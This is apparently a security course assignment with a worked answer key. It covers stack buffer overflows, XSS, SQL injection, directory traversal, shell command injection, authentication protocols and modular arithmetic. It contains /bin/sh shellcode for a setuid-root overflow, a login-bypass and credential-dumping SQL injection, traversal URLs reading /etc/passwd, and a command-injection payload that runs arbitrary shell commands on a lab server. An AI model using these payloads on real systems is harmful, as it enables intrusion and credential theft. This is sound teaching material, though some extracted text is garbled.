doc

advertisement
Assignment 4: Local & Application Exploits
In this assignment, we explore remote to local and privilege escalation exploits used to gain or
elevate attacker access to systems. Throughout this assignment we will see these exploits used at
both the operating system as well as the application level, learn about how they happen and how we
can prevent them (both as developers as well as system administrators).
1. Buffer Overflows (75 pts)
In this section, you will be learning about buffer overflows in the stack, a common vulnerability in
programs that allows you to run arbitrary code. This lab will require some programming in C, some
knowledge of assembly, and a touch of debugging tools.
Background
Stack-based buffer overflows have been around for a long time and all indications are that they will
continue to be a problem in the near future. Aleph One wrote the definitive paper on using this
technique to exploit programs, Smashing The Stack For Fun And Profit. You should read this paper
carefully. It will walk you through every aspect of overflowing the buffer, creating a shellcode, and
ultimately exploiting a vulnerable program. It is very long and full of technical detail -- make sure to
set aside plenty of time to work through it. Also keep in mind that your Linux version and gcc
compiler may be different from those they used for the paper, so the numeric values in the examples
shown in that paper (such as pointer value, number of bytes, etc.) could be different.
Exploiting
Several strategies have been created to counter these types of bugs in programs. The version of
Linux installed on your machine employs two different kernel-based stack protection mechanisms.
One randomizes stack addresses to make it difficult to predict locations of shellcode. The other
places random canary values on the stack to protect stored addresses. You need to disable both of
these mechanisms or else it will be difficult to exploit overflows on your system.
 To
disable
stack
protection,
run
the
script
(as
root
or
through
sudo) /root/bin/disable-stack-protection. To re-enable stack protections,
run /root/bin/enable-stack-protection. Note that if your system is ever
rebooted, the stack protections will be re-enabled by default.
 To disable the placing of canary values in your executables, you need to use gcc-3.4,
which is already installed.
a. Download the zip file from strawman, examine the code in uppercase.c and
lowercase.c. These programs are simple UNIX utilities that will accept a string involving
both upper and lower case characters from the command line and return that string
converted entirely to upper case or lower case characters. Do these programs have any
internal buffers? Do they do any input length checking? Describe what seems, at first glance,
to be unsafe. Provide comments on a line-by-line basis.
(5 pts)
The local variable buf is the internal buffer (512 bytes in length). In the for loop our input
length is checked using strlen() but the validation against the internal buffer is not
performed. The strcpy() function, issued without any check on the length of the input,
could produce a buffer overflow (strncpy() should be used instead). The setuid()
operation is also not recommended unless absolutely necessary.
b. Now focus on uppercase.c. Run make to compile the program. Make sure you DO
NOT compile the programs directly with gcc, as that will use gcc version 4 which inserts
canary values. Run uppercase, and find a string input that will cause it to segmentation
fault. Why does this happen?
(5 pts)
A string longer than about 524 bytes should cause the segmentation fault. This happens
because the return instruction pointer (EIP) is overwritten with an illegal address by the
overflowing buffer.
c. Use gdb to run the program again with the same, very long, first argument (Hint: set args
AAAAAAA...). What is the %eip address reported when it causes segmentation fault?
Compare this value to your string's ASCII hexadecimal representation (Hint: man ascii).
Determine the length of the shortest string needed to control %eip.
(5 pts)
The shortest length of string recorded in my test was 529 bytes. The %eip address should
be the last 4 bytes of the shortest string that caused segmentation fault.
d. Draw a diagram of the stack for uppercase which includes the stack frames for main()
and strcpy() and all local variables for main(). Also, include the location of main()'s
return address and how it gets overwritten by an overflown buf. Finally, include the
arguments passed to the main() program in the diagram as well, relative to the stack
frames. Exact offsets aren't that important here, but relative locations are (Hint: use print
command to know the location of local variables, arguments, etc., e.g.: print &buf).
(10 pts)
Address
0x00000000
Contents
Unused Memory
strcpy()’s stack frame
main()’s stack frame
i
buf[512]
argv**
0xbffffffa
argc
Return pointer
argc, argv[], environment, etc...
If the diagram is drawn upside-down, it is also fine as long as everything is correct in relative
terms.
e. Write a new program in C which exploits this stack-based buffer overflow to execute a shell.
Your exploit should embed a shellcode in the argv[1] buffer of uppercase and then
overwrite the stack frame return address so that execution continues within that buffer
when main() returns. The shellcode you need to use is:
char scode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
The exploit program you will be writing should look like below:
void main() {
/* variable declaration here */
/* preparation for exploiting here */
/* then call execl() to invoke the uppercase program,
where arg is a string (i.e. char[], or char*)
*/
execl("./uppercase", "./uppercase", arg, NULL);
}
As mentioned, remember to disable the stack protection and disable the canary values,
otherwise, it will be much harder to exploit.
Once you have a working exploit which executes a shell, make uppercase a setuid root
program by running chmod u+s uppercase as root. Now, run your exploit again as a nonroot user. Once your shellcode runs, use the id(1) command to determine what user the
shell is executed as. If everything works correctly, you'll have elevated privileges to root
through this overflow.
Please submit source code for your exploit that has comments on every line demonstrating
that you understand how this works. Points will be deducted for less than thorough
explanations.
(30 pts)
Before running the exploit, remember to disable the stack protection, and use gcc-3.4 for
compilation.
sample-exploit.c
another-sample-exploit.c
f. How would you modify the lowercase program to make it safe from buffer overflow
attacks?
(10 pts)
The most basic thing that can be done is to replace strcpy with its “safe” cousin
strncpy(buf, argv[1], length-of-str). An explicit strlen check is also a
possible option.
g. If buf were instead allocated via malloc() in these vulnerable programs, would the same
techniques for exploitation work? Why or why not?
(5 pts)
malloc() allocates memory on the heap instead of the stack. Overflowing the heap for the
purposes of an exploit is possible, but the techniques are much different and often require
more effort, since helpful structures like return addresses and stack pointers don't generally
live in the heap.
h. What is different about executing a setuid program versus a non-setuid program? What are
the dangers of setuid programs? Why are setuid programs sometimes necessary?
(5 pts)
setuid programs execute as the user who owns the binary, rather than the user who is
executing it. If vulnerability exists in the setuid binary, then a local user could exploit it to
take over the account that owns it. Often these are necessary, as many every-day tasks
require privileged access to system calls where alternative privilege models are not available.
2. Application Exploits (100 + 20 pts)
In this section, you will explore common vulnerabilities in applications. Your experiments on a webbased application will try to exploit vulnerabilities that are commonly found on these types of
programs.
a)
Cross-site Scripting (20 pts)
Cross-site scripting vulnerabilities are common in web applications. These flaws allow you to expose
the interaction between users and a website. Read more about the different forms of XSS and how
they are typically exploited.
The application you will test on is at the URL: http://strawman/blog/. You should access this web
site from either your Windows machine or over a SSH tunnel. Locate the login page for this
application, and fuzz the form fields with HTML special characters to locate a cross-site scripting
bug.
a. Now, develop a proof-of-concept (PoC) exploit for this bug which embeds an image tag
(eg. <img src="..." />) into the page (use any image URL you want). Your injected
HTML characters must present a final page to the browser which is HTML compliant. Once
you have developed a working PoC exploit, take a screen shot of the page in your browser.
In addition, save the HTML source of the resulting, exploited page. Submit both of these in
your report.
Username:
Tester"/></td></tr><tr><td><img src="url_to_an_image_file"><div
class="foo
Password:
"/></td></tr><tr><td><img src="another_image_file" "><div
class="bar
The HTML code of the page after injection must not break the HTML compliant rule (e.g.
opening tags must have closing tags).
b. Find an additional XSS vulnerability on a page other than the login page. This second
vulnerability should be accessible without having to log in. Write a short PoC exploit for this
second bug and record just the string you inject. You do not need to save a screenshot or
the full HTML source. Include in your report the string you used for your second XSS
exploit along with the name of page and the name of the form element you attacked.
The last link at the bottom of the page, which allows users to choose Printable friend view,
contains an additional XSS vulnerability. The url is injected:
http://strawman/blog/index.php?style=injected_html_code
This security hole is also dangerous because by injecting to the url, the source code of the
php pages can be found when viewing source of the returned page, for example:
http://strawman/blog/index.php?style=index.php
Note: any vulnerability in other pages (except the login page) is also ok.
b)
SQL Injection (30 + 20 pts)
WARNING: In this section you will be manipulating the backend database of this application. There
is a small chance that your attacks will break or disable the web application. Please think carefully
about the attacks before you perform them, as other students need to use the same system. If you
do break something, report it to the lab TA immediately so it can be fixed.
SQL injection vulnerabilities are very serious flaws which open applications up to a whole host
of database attacks. These vulnerabilities affect more than just web based applications and often
allow the circumvention of authentication/access controls for information stored in a database. Also,
SQL injection flaws can sometimes be the stepping stone used by attackers to fully compromise a
database server. Read more about SQL injection through the provided references. You may also
want to search the web for more information on the topic.
a. Return to the login page of the weblog application. At least one SQL injection vulnerability
exists in this form. Develop an exploit for this form which allows one to log in to the
application without knowing a valid username or password. Hints: Imagine the SQL query a
programmer might write to check a user's credentials. The backend database is MySQL.
Also, the string -- is the SQL comment and behaves much the same as // does in
C++. Record the resulting injection string you used to log in. (10 pts)
Students must provide the injected SQL code that allows them to login successfully as a valid
user. Example:
Username: ' or 1=1-Password: ' or 1=1-b. Locate one another SQL injection vulnerability in some other page of the application.
Develop a simple PoC exploit which demonstrates how you can manipulate the results of the
query. (10 pts)
An example: The feature of the viewentry.php page is listing the entry with a specified
message id. We can change this behavior to list all entries of the weblog without navigating
to the index.php page.
The following code is injected to the msgid parameter of the viewentry.php page:
msgid=1' or '1'='1
Note: any SQL code that changes the displayed result of a page (compared to the
“official/expected” result) is considered as successful exploit.
c. Bonus question: Write an SQL injection exploit which steals a username and password from
this application's database. (20 pts)
Students must show the method/code they used to obtain the correct username and
password.
The below SQL code can be used to retrieve the usernames and passwords:
msgid=' union select 1, username, password, "" from adminuser
where password <> '
Username and password of the admin user can be also discovered using shell command
through SQL injection via sendmail.php (see Shell Command Injection section).
d. Suppose a programmer needs to run an SQL query such as:
SELECT * FROM mytable WHERE a='foo' AND b='bar'
In his application, users can completely control the data in strings foo and bar. To protect
his application against SQL injection the programmer decides to insert a backslash \ in front
of all single quote characters provided by users in these strings. This is an acceptable form
of escaping/encoding in his database system. For example, if a user provided a string
"Let's drive to the beach!", it would be encoded in the SQL query as "Let\'s
drive to the beach!". Therefore, inserting single quote characters would not allow
attackers to break out of the explicit single quotes in the query. Describe why this
protection alone would not prevent an SQL injection attack for this particular query, and
give a sample set of strings which demonstrate the problem. (Hint: Recall that the attacker
can control both strings in this query.)
(10 pts)
To manipulate the single quote, the attacker can use \' for each single quote he wants to
inject. For example:
The original query:
SELECT * FROM mytable WHERE a='foo' AND b='bar'
The injected code to the parameter a:
\' or 1=1-The resulted query, which will list all rows in the table:
SELECT * FROM mytable WHERE a='\\' or 1=1-- AND b='bar'
c)
Directory Traversal (25 pts)
Directory traversal attacks are another, somewhat less common, class of application vulnerability
which typically occurs because programmers trust some portion of a filename or file system path to
be provided by users, without validation or sanitization. These flaws often result in unauthorized file
retrieval and sometimes even facilitate remote execution attacks. Read more about directory
traversal attacks and how they are typically exploited.
a. Explore the weblog application and search for a user supplied parameter that might allow a
directory traversal attack. Once you locate one, use it to download the
system's /etc/passwd file. Submit the /etc/passwd file.
(10 pts)
Exploit the “Printable friendly format” feature mentioned in XSS attack above:
http://strawman/blog/?style=../../../../../etc/passwd
b. Pull down other files until you find positive evidence of what OS and version is hosting the
website. Save these files for your report.
(10 pts).
Similar technique as above:
http://strawman/blog/?style=../../../../../proc/version
c. Suppose a programmer accepts a filename through a URL request parameter, in a script
named safefromtraversal.php. In this script, the programmer removes all
occurrences of the string '../' from the filename provided by clients. (In other words, the
request parameter is searched for any occurrences of this string. Any found are replaced
with the 0 length string, and later the parameter is used as a filename.) With this protection
alone, would the script be secure against directory traversal attacks? If not, describe an
attack to bypass this protection.
(5 pts)
Functions for string replacement in many programming languages don’t use recursive
replacement, so the attackers can use ....// for each string ../ they want to inject.
d)
Shell Command Injection (25 pts)
WARNING: In this section you will be running commands on the server hosting this application.
There is a small chance that your attacks will break or disable the web server or application. Please
think carefully about the attacks before you perform them, as other students need to use the same
system. If you do break something, report it to the lab TA immediately so it can be fixed.
Shell command injection, while somewhat rare, can be devastating to an application's security
because these kinds of flaws generally allow remote execution of code and are usually easy to
exploit.
The problem usually lies in an application's use of external commands to accomplish certain tasks.
Often, for the convenience of it, programmers will run external commands via the system shell or
some equivalent interface. However, if user input is included in such commands (for instance, as
command line parameters), then it is very difficult to prevent shell meta-character
injection. Read more about these attacks and how they can be prevented (accessible only through
your Windows VM.)
a. Review the pages available in the weblog application and think about what pages are most
likely to use an external command. Now, find and exploit one command injection
vulnerability. To prove you can run commands on the server, write a file
to /tmp named team-T.hack (where T is your team number) which contains the email
addresses of all of your team members. This file may contain other garbage as well, but it
should have your team members' email addresses somewhere in it. To test whether you were
successful, you can read the file back in again with the directory traversal vulnerability you
found earlier.
Hint: You may use the directory traversal vulnerability to swipe the source code for many
PHP scripts. Reviewing the sources will allow you to find such a hole very quickly.
You need to describe the method and the command, url, etc. you used to perform the attack
in your report.
(15 pts)
Students should obtain the source code of the sendmail.php page, then notice that the
sendmail.php doesn’t check the input before running shell_exec().
The following exploit allows us to run arbitrary shell command via “Contact the Webmaster”
page:
Subject: any text you want here
Body:
'; <arbitrary shell command> | /usr/sbin/sendmail -f
webmaster@strawman.nslab teamXX@teamXX-router.nslab ; /bin/echo
'
The output of the executed arbitrary shell command can be read by running the mail
program in the Linux machine (in the above code, teamXX@teamXX-router.nslab is used for
the receiving email address).
b. Consider the functions execl and system from the standard C library. Explain why
using execl is safer than system. Why would a programmer be tempted to use system?
(5 pts)
The system() function takes only 1 argument as the command line string, which includes
the command name and its arguments, and call the shell to execute this command line. Thus,
the attacker can freely manipulate one or some of the arguments to break the current
command into multiple arbitrary commands.
The execl() function is safer because it takes the first argument as command name, and
the others arguments as arguments for that command, and finally directly calls the command
without using shell. Therefore, the attacker cannot manipulate either the command name,
either the arguments, otherwise errors occur.
The programmer, however, still loves to use system() function due to its ease. Moreover,
using execl() function means the current process is replaced with the new process which
runs the specified command. Hence, in order to return to the original process, the
programmer should fork() before calling execl(). This is perhaps the biggest
disadvantage of using execl().
c. Consider the following snippet of C code:
snprintf(cmd, 1024, "whois %s >> /tmp/whois.log", ip);
system(cmd);
Suppose an attacker could completely control the content of the variable ip, and that this
variable isn't checked for special characters. Name three different meta-characters or
operators which could allow an attacker to "break out" of ip's current position in the string
to run an arbitrary command.
(5 pts)
Three special meta-characters when using shell command are preferred by the attacker:
“;”: this allows the attacker to run a new command after the command specified by the
programmer.
“|”: this allows the attacker to redirect the output of a command to the input of another
command that is under controller by the attacker.
“>” or “>>”: this allows the attacker to write or append the output of a command to a file
that can be read by the attacker.
3. Impersonation, authentication and session keys
(15 pts)
a) Explain why it is a bad idea for the initiator in a mutual authentication protocol to send out
the first challenge. [3]
It is a bad idea for the initiator in a mutual authentication protocol to send out the first
challenge as in that case, following attacks are possible.
Man in the middle attack
If the initiator is allowed to send out the first challenge, then an intruder can initiate the
communication and be able to carry out Man in the middle attack successfully to impersonate
a valid user as shown.
A
I
B
1. I’m A, C1
 3. I’m B, C2
4. I’m A, E (C2), C3 

 2.I’m B, E (C1), C2
5.E (C2) 
Here, I communicates with B as if it is A, using A as a decryptor.
Connection Attack
An intruder can initiate the communication and be able to carry out connection attack
successfully to impersonate a valid user as shown below.
I
I’m A, C1 
B
 I’m B E(C1), C2
I’m C, C2 
 I’m B E(C2), C3
E(C2) 
Here, I communicates with B as if it is A using B itself as a decryptor through multiple
connections.
b) Consider a network such as the Internet where Trudy can inject spoofed packets in an
attempt to hijack a conversation between Alice and Bob. Trudy can send packets with
Alice’s address as the source address to Bob but the network will not deliver packets with
Alice’s address as the destination address to Trudy. What are some problems in Trudy
attempting to transmit a file to Bob by pretending to be Alice. [3]
Following are the problems Trudy will face:
1. When Trudy sends a file to Bob as a stream of packets over TCP, firstly it is difficult to
setup a TCP connection with three way handshake as Bob would send SYN ACK to Alice and
not Trudy.
2. If Trudy tries to hijack an existing communication between Alice and Bob and send the file
over the same, then Bob will continuously send acknowledgements for each packet to Alice.
There is no way for Trudy to figure out if Bob receives the exactly same file as Trudy had
sent it.
3. Trudy cannot use flow control mechanism due to lack of any ACK from Bob and hence
does not know the optimal rate at which it should transmit data in order to avoid packet loss
at Bob’s end.
4. If the communication between Trudy and Bob is over FTP, Trudy will have problem in
setting up the FTP connection. In FTP connection, Trudy has to set up a data connection
on the port Bob sends in the control line. Since Trudy does not get information sent by Bob
on control line, she cannot set up FTP data connection with Bob to send a file.
5. Even if Trudy tries to hijack an existing FTP session between Alice and Bob, She will not
get any information in case of connection reset or packet loss due to above mentioned
problems in TCP connection.
c) Let Alice and Bob share the secret key K. Let R be a random string that is exchanged in the
clear during the authentication phase. Why are the following bad choices as session keys:
EK(K), ER+K(K) and RK? [5]
 EK(K) : If we use EK(K), we would have same session key for all sessions, which does not
add much security over not having a session key at all.

ER+K(K) : Consider we use ER+K (K) as a session key. Since R is being transmitted in clear,
the attacker can easily get hold of R. In that case, the difficulty of guessing session key
reduces to guessing shared secret – K. This is similar to previous case. Also, in some
cases, we may want to establish a session using shared secret K and give relatively
untrusted software the session key as mentioned in 4th point of answer d. In this case, if
we use ER+K(K) as a session key, we need to give out the shared key as well to the
untrusted software.

R  K: R  K is not a good choice for session key because, if the attacker gets session
key S, he can get shared secret K as well by taking S R, where C is cipher text block.
d) What are some reasons for having a session key in the first place. Why not simply use the
shared secret for encrypting the session? [4]
Following are the reasons for having a session key different from shared secret:
1. Keys wear out if used a lot. If we use session key same as shared secret K, the intruder
will be getting access to more amount of data encrypted with the key K. This increases
chances of an attacker being able to successfully find the key K.
2. The shared secret K generally has longer validity time than a single session. If we use K as
a session key, then an attacker might be able to replay the messages from an old
conversation.
3. If a long-term shared secret key is compromised, it is desirable to prevent an old recorded
message from being decryptable. If every conversation is encrypted with the same key K,
then this would be difficult to achieve.
4. We may want to establish a session and give to relatively untrusted software the session
key, which is good only for that conversation, rather than giving away the long-term shared
secret.
4. Secret-key Authentication (15 pts)
Alice  KDC: N1, Alice wants Bob
KDC  Alice: KA(N1,KAB,Bob,ticket); ticket = KB(KAB,Alice)
Alice  Bob: ticket, KAB(N2)
Bob  Alice: KAB(N2-1,N3)
Alice  Bob: KAB(N3-1)
a) Explain how, in the absence of N1, Trudy can impersonate Bob using an old key of Bob’s and
an old reply from the KDC. [5]
Suppose that N1 is not used at all. Trudy gets hold of an old key of Bob KBold as well as an
old reply from KDC, Rold.
When Alice requests for conversation with Bob, Trudy first impersonates KDC and replays
old message - Rold ,which looks like an ordinary reply from KDC. Trudy then impersonates
Bob to Alice, because she knows the key - KBold and hence can decrypt the ticket to extract
KAB .
Alice wants Bob
Rold = KA (KAB, Bob, ticket);
Ticketold = KBold(KAB,Alice)
Alice
Ticketold, KAB(N2)
Trudy
KAB(N2-1,N3)
KAB(N3-1)
b) Why does the reply from KDC to Alice contain “Bob”? [3]
Suppose there is no “Bob” in reply from KDC to Alice, then Trudy changes initial request
from Alice to KDC to {N1, “Alice”, “Trudy”}. Complying with the request it gets, KDC
sends ticket encrypted with key for Trudy, KT instead of key for Bob, KB. Now, Alice uses
this ticket for setting up the conversation. Since, Trudy can decrypt the ticket, she can
impersonate Bob.
N1, Alice,Bob
Trudy
N1, Alice,Trudy
KDC
Trudy
KA (KAT, ticket); Ticket = KT(KAT, Alice)
Alice
Ticket, KAT(N2)
KAT(N2-1,N3)
Trudy
KAT(N3-1)
c) Explain how Trudy can impersonate Alice using an old key of Alice’ and an old reply from
the KDC [5]
Suppose that Trudy gets hold of an old key of Alice - KAold and an old reply from KDC – Rold .
Now Rold is encrypted using KAold and hence Trudy can decrypt the same. Trudy skips the first
two steps of the protocol. She extracts Ticketold out of Rold and sends it to Bob to initiate
the conversation. Assuming that Bob’s secret key – KB is not changed, Bob finds the
Ticketold perfectly valid request coming from Alice and proceeds with normal conversation
setup. Thus, Trudy can impersonate Alice.
Trudy
Ticketold, KAB(N2)
Bob
KAB(N2-1,N3)
KAB(N3-1)
d) What is the name of the authentication protocol that underlies Kerberos? [2]
The protocol used in Kerberos is Needham-Schroeder protocol.
5. Modular arithmetic (15 pts)
a) Which of the numbers 1,2,…,20 are coprime to 21? What is (21)? [5]
 Numbers between 1-20, which are coprime to 21 are: 1,2,4,5,8,10,11,13,16,17,19,20.

(21) = 12
b) What is 3^2008 mod 11? [4]
3^2008 mod 11 = 3^ (2008 mod 10) mod 11= 3^8 mod 11= 6561 mod 11 = 5
c) Name the two mathematical problems at the heart of most public key systems? [2]
Two mathematical problems at the heart of most public key systems are factorization and
discrete log.
d) What is repeated squaring and what is it used to compute? [4]
“Repeated squaring” is an algorithm used for the fast computation of large integer powers of
a number. In this, for any even power n, xn is expressed as
xn/2 * xn/2, while an odd power n is first expressed in terms of nearest even power and then
reduced further by repeating this.
This reduces number of steps required for calculating xn to log 2 n steps as compared to naïve
algorithm requiring n-1 steps.
Note: Diagram from Wikipedia.
Download